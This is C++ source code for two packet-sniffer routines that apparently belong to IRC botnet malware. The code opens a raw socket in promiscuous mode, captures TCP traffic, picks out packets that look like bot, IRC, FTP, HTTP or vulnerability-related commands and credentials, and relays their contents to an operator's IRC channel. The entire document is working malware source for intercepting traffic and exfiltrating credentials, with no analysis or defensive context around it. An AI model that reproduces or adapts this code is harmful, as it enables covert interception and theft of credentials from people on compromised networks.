void *CSniffer::Run() {
int sock; sockaddr_in addr_in; hostent *hEnt;
IPHEADER *ipHeader; TCPHEADER *tcpHeader; char *szPacket;
char szName[255]={0}; unsigned long lLocalIp;
addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
addr_in.sin_addr.s_addr=lLocalIp;
sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(sock==INVALID_SOCKET) return NULL;
if(bind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
#ifdef _WIN32
closesocket(sock);
#else
close(sock);
#endif // _WIN32
return NULL; }
#ifdef WIN32
int optval=1; DWORD dwBytesRet;
if(WSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
{ closesocket(sock); return NULL; }
#endif // WIN32
char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;
while(g_pMainCtrl->m_bRunning)
{ // Clear the buffer
memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;
// Wait till the sniffer is enabled
while(!g_pMainCtrl->m_cBot.sniffer_enabled.bValue) Sleep(1000);
// Read the raw packet
#ifdef _WIN32
iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
#else
iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
#endif // _WIN32
// Process if its a TCP/IP packet
if(ipHeader->proto==6)
{ tcpHeader=(TCPHEADER*)(szRecvBuf+sizeof(*ipHeader));
int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
if(iSrcPort !=110 && iSrcPort!=25 &&
iDestPort !=110 && iDestPort!=25 &&
iSrcPort!=g_pMainCtrl->m_cBot.si_port.iValue && iDestPort!=g_pMainCtrl->m_cBot.si_port.iValue)
{
sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
for(int i=0; i<strlen(szPacket); i++) {
if(szPacket[i]=='\r') szPacket[i]='\x20';
if(szPacket[i]=='\n') szPacket[i]='\x20'; }
if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
{ g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
"Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
{ g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
"IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
{
g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
"FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
}
else if(IsSuspiciousHTTP(szPacket))
{
g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
"HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
}
else if(IsSuspiciousVULN(szPacket))
{
g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.vuln_channel.sValue.Str(),
"VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
}
}
}
}
return NULL;
}
DWORD WINAPI SnifferThread(LPVOID param) {
SNIFFER sniff = *((SNIFFER *)param);
SNIFFER *sniffs = (SNIFFER *)param;
sniffs->gotinfo = TRUE;
char sendbuf[IRCLINE];
int sock; sockaddr_in addr_in; hostent *hEnt;
IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket;
char szName[255]={0}; unsigned long lLocalIp;
addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
addr_in.sin_addr.s_addr=lLocalIp;
sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(sock==INVALID_SOCKET) return NULL;
if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
int optval=1; DWORD dwBytesRet;
if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
{
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;
while(1)
{
// Clear the buffer
memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;
// Read the raw packet
iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
// Process if its a TCP/IP packet
if(ipHeader->proto==6)
{ tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
if(iSrcPort !=110 && iSrcPort!=25 &&
iDestPort !=110 && iDestPort!=25)
{
sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
for(int i=0; i<(int)strlen(szPacket); i++) {
if(szPacket[i]=='\r') szPacket[i]='\x20';
if(szPacket[i]=='\n') szPacket[i]='\x20'; }
if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousHTTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousVULN(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
}
}
}
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
return 0;
}
